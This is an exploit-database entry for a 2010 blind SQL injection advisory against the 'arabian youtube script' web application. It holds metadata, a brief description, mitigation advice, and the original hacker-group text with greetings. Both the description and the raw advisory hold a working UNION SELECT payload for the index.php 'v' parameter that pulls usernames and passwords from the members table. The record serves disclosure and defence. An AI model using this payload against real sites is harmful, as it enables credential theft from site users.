blind SQL Injection Vulnerabilities

vendor:

arabian youtube script

by:

R3d-D3v!L

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: arabian youtube script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

blind SQL Injection Vulnerabilities

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by appending malicious SQL queries to the vulnerable parameter in the URL. For example, http://127.0.0.1/clip/index.php?v=11+and+1=0+union+select+1,concat%28uname,passwd%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members--

Mitigation:

Input validation should be used to detect and reject malicious input. Parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
  
[~] Tybe: blind SQL Injection Vulnerabilities  
[~] Vendor: www.4smart.net 
[+] Software: arabian youtube script
[+] author: ((R3d-D3v!L))  
[~]  
[+] TEAM: Xp10_hACKEr
[~]  
[?] contact: X[at]hotmail.co.jp  
[-]  
[?] Date: 15.nov.2010  
[?] T!ME: 03:04 am CMT  
[?] Home: WwW.XP10.COM              
[^]© Xp10_hAcKEr  
[?]  
    
======================================================================================  
# SQL Injection #     index.php v=
======================================================================================  
[*] Err0r C0N50L3:  
http://127.0.0.1/clip/index.php?v=   {EV!L EXPLO!T}  
    
[*] prove of concept  = {EV!L EXPLO!T}  =
  
 www.Xp10.CoM/clip/index.php?v=11+and+1=0+union+select+1,concat%28uname,passwd%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members--   
 
 
[~]-----------------------------{((MAGOUSH-87))}------------------------------------------------
#  
#  
[~] Greetz tO: [dolly &MERNA &hetlar jeddaH &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] #  
#  
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #  
#  
[~] spechial thanks : ((HITLER JEDDAH & rootshell& DR.DAShER& abo shahd &abo mohammed)) ALL XP10 MEMbers #  
#  
[?]spechial SupP0RT : MY M!ND # © Offensive Security #  
#  
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #  
#  
[~]spechial FR!ND: XP10.COM #  
#  
[~] !'M 4R48!4N 3XPL0!73R. #  
#  
[~]{[(D!R 4ll 0R D!E)]}; #  
#  
[~]---------------------------------------------------------------------------------------------